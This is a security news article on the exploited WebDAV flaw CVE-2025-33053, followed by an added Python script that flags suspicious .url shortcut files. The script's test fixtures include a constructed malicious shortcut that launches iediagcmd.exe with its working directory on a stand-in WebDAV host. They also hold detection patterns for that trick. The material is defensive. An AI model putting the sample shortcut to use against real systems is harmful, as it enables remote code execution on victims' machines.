WebDAV Remote Code Execution 0-Day Actively Exploited — PoC Released
gbhackers
A critical zero-day vulnerability in Microsoft’s Web Distributed Authoring and Versioning (WebDAV) protocol, tracked as CVE-2025-33053, has been actively exploited by the advanced persistent threat (APT) group Stealth Falcon since March 2025.
The flaw, patched in June’s Patch Tuesday, enables remote code execution (RCE) via manipulated .url shortcut files and has been linked to attacks against Middle Eastern defense sectors.
Vulnerability Overview
According to the report, CVE-2025-33053 (CVSS 8.8) allows attackers to hijack the working directory of legitimate Windows tools such as iediagcmd.exe, forcing them to execute malicious payloads from attacker-controlled WebDAV servers.
Key details:
| Component | Details |
|---|---|
| Affected Systems | Windows 10/11, Windows Server 2016–2025, and legacy unsupported versions |
| Exploit Mechanism | Abuse of WebDAV UNC path handling to redirect a shortcut's WorkingDirectory |
| Initial Vector | Phishing emails carrying .url files masquerading as PDFs |
| Primary Payload | Horus Agent (Mythic-framework implant with anti-analysis techniques) |
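The mechanism in the table reduces to one observable artifact: an Internet Shortcut (.url) file whose URL launches a local executable while its WorkingDirectory points at a WebDAV share reached over a UNC path. The following triage script is an added example, not code from the article, from the researchers who reported the campaign, or from Microsoft. It assumes only the public .url file format ([InternetShortcut] section with URL= and WorkingDirectory= keys) and the Windows WebDAV client's UNC conventions (\\host@80\..., \\host@SSL\..., DavWWWRoot). The sample files, host address and scoring thresholds are constructed for the demo; the check is written generically for any local executable rather than only iediagcmd.exe, and it does not reproduce the exploitation chain itself.

```python
"""Heuristic triage of .url (Internet Shortcut) files for the CVE-2025-33053 pattern.

Added example (not the article's or any vendor's code). It flags shortcuts that
launch a local executable with a WorkingDirectory on a UNC/WebDAV path, plus
.url files whose name masquerades as a document. Detection logic is a heuristic
assumption, not the vendor's detection rule.
"""
import configparser
import re
from pathlib import PureWindowsPath
from typing import Dict

# Constructed sample .url files for the demo (not real samples from the campaign).
SAMPLE_URL_FILES: Dict[str, str] = {
    "invoice.pdf.url": (
        "[InternetShortcut]\r\n"
        "URL=file:///C:/Program Files/Internet Explorer/iediagcmd.exe\r\n"
        "WorkingDirectory=\\\\203.0.113.10@80\\DavWWWRoot\\share\r\n"
        "IconFile=C:\\Windows\\System32\\shell32.dll\r\n"
        "IconIndex=1\r\n"
    ),
    "benign.url": (
        "[InternetShortcut]\r\n"
        "URL=https://example.com/\r\n"
    ),
    "local-tool.url": (
        "[InternetShortcut]\r\n"
        "URL=file:///C:/Windows/notepad.exe\r\n"
        "WorkingDirectory=C:\\Users\\alice\\Documents\r\n"
    ),
}

UNC_RE = re.compile(r"^\\\\[^\\]+")  # \\host\... (any UNC target)
# Windows WebDAV redirector conventions: \\host@80\, \\host@SSL\, \DavWWWRoot\
WEBDAV_RE = re.compile(r"@(80|443|ssl)(\\|$)|\\DavWWWRoot(\\|$)", re.I)
# file:///C:/...something.exe or a bare drive path to an executable
LOCAL_EXE_RE = re.compile(r"^(file:///?)?[a-z]:[\\/].*\.(exe|com|cmd|bat)$", re.I)
DOC_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx"}


def parse_url_file(text: str) -> Dict[str, str]:
    """Return the [InternetShortcut] keys (lower-cased) or {} if absent."""
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",))
    cp.read_string(text.replace("\r\n", "\n"))
    if not cp.has_section("InternetShortcut"):
        return {}
    return {k.lower(): v.strip() for k, v in cp.items("InternetShortcut")}


def masquerades_as_document(filename: str) -> bool:
    """True for names like invoice.pdf.url (document extension hidden before .url)."""
    p = PureWindowsPath(filename)
    return p.suffix.lower() == ".url" and PureWindowsPath(p.stem).suffix.lower() in DOC_EXTS


def analyze_url_file(filename: str, text: str) -> Dict[str, object]:
    """Score one .url file: 'suspicious', 'review' or 'clean'."""
    fields = parse_url_file(text)
    url = fields.get("url", "")
    wd = fields.get("workingdirectory", "")
    local_exe = bool(LOCAL_EXE_RE.match(url))
    unc = bool(UNC_RE.match(wd))
    webdav = bool(WEBDAV_RE.search(wd))
    if local_exe and unc:
        verdict = "suspicious"  # local tool launched with a remote working directory
    elif local_exe or unc or webdav or masquerades_as_document(filename):
        verdict = "review"
    else:
        verdict = "clean"
    return {
        "file": filename,
        "url": url,
        "working_directory": wd,
        "launches_local_executable": local_exe,
        "working_dir_is_unc": unc,
        "working_dir_is_webdav": webdav,
        "masquerades_as_document": masquerades_as_document(filename),
        "verdict": verdict,
    }


def scan(files: Dict[str, str]) -> Dict[str, Dict[str, object]]:
    """Analyze a mapping of filename -> file contents."""
    return {name: analyze_url_file(name, text) for name, text in files.items()}


if __name__ == "__main__":
    for name, result in scan(SAMPLE_URL_FILES).items():
        print(f"{name}: {result['verdict']} (wd={result['working_directory']!r})")
```

In practice you would feed this the contents of .url attachments pulled from mail quarantine or from user profiles; a verdict of "suspicious" is the combination the article describes (trusted local binary plus attacker-controlled working directory) and is worth blocking outright, while "review" catches the weaker indicators on their own.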
Technical ...
Copyright of this story solely belongs to gbhackers.